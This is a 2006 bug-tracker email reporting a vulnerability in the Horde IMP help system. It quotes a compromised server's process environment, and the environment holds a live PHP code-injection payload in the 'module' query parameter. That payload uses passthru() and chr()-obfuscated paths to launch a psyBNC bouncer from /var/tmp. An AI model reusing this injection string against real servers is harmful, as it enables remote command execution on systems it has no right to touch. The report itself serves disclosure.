[Tickets #3948] NEW: Help system vulnerability, please fix

bugs@bugs.horde.org bugs at bugs.horde.org
Thu May 18 06:33:46 PDT 2006 

DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.

Ticket URL: http://bugs.horde.org/ticket/?id=3948
-----------------------------------------------------------------------
 Ticket             | 3948
 Created By         | max at ukrhostig.com
 Summary            | Help system vulnerability, please fix
 Queue              | IMP
 Version            | 4.1.1
 State              | Unconfirmed
 Priority           | 3. High
 Type               | Bug
 Owners             | 
-----------------------------------------------------------------------


max at ukrhostig.com (2006-05-18 06:33) wrote:

I?ve faced help system vulnerability problem, please let me know if you have
any path for this hole.

d 13277 0.0 0.1 5720 1244 ?? SN 30Apr06 1:08.51 GATEWAY_INTERFACE=CGI/1.1
UNIQUE_ID=RFTsPT6VDXUAASLFWMk LANGUAGE=en_US
REDIRECT_REDIRECT_UNIQUE_ID=RFTsPT6VDXUAASLFWMk HTTP_TE=deflate,gzip;q=0.3
REMOTE_ADDR=212.71.158.93
OLDPWD=/hsphere/shared/apache/htdocs/horde/services/help
QUERY_STRING=show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22var%22.c
hr(47).%22tmp%22.chr(47).%22psybnc;%20.%22.chr(47).%22psybnc%22);'.
REMOTE_PORT=38928 HTTP_USER_AGENT=Nozilla/P.N (Just for IDS woring)
DOCUMENT_ROOT=/hsphere/shared/apache/htdocs
REDIRECT_QUERY_STRING=show=about&module=;%22.passthru(%22cd%20%22.chr(47).%2
2var%22.chr(47).%22tmp%22.chr(47).%22psybnc;%20.%22.chr(47).%22psybnc%22);'.
SERVER_SIGNATURE=<ADDRESS>Apache/1.3.33 Server at 62.149.13.117 Port
80</ADDRESS>\n
PATH_TRANSLATED=/hsphere/shared/apache/htdocs//horde//services/help/index.ph
p SCRIPT_FILENAME=/hsphere/shared/apache/php/bin/php HTTP_HOST=62.149.13.117
REDIRECT_REDIRECT_STATUS=200
REQUEST_URI=//horde//services/help/?show=about&module=;%22.passthru(%22cd%20
%22.chr(47).%22var%22.chr(47).%22tmp%22.chr(47).%22psybnc;%20.%22.chr(47).%2
2psybnc%22);'. SERVER_SOFTWARE=Apache/1.3.33 (Unix) mod_ssl/2.8.22
OpenSSL/0.9.7c FrontPage/5.0.2.2635 REDIRECT_UNIQUE_ID=RFTsPT6VDXUAASLFWMk
HTTP_CONNECTION=TE, close REDIRECT_URL=//horde//services/help/index.php
PATH=/usr/bin:/bin LANG=en_US SERVER_PROTOCOL=HTTP/1.1
PATH_INFO=//horde//services/help/index.php REDIRECT_STATUS=200
REQUEST_METHOD=GET SERVER_ADMIN=webmaster at ukrhosting.com
SERVER_ADDR=62.149.13.117 PWD=/var/tmp/psybnc SERVER_PORT=80
SCRIPT_NAME=/php/bin/php SERVER_NAME=62.149.13.117 ./psybnc

More information about the bugs mailing list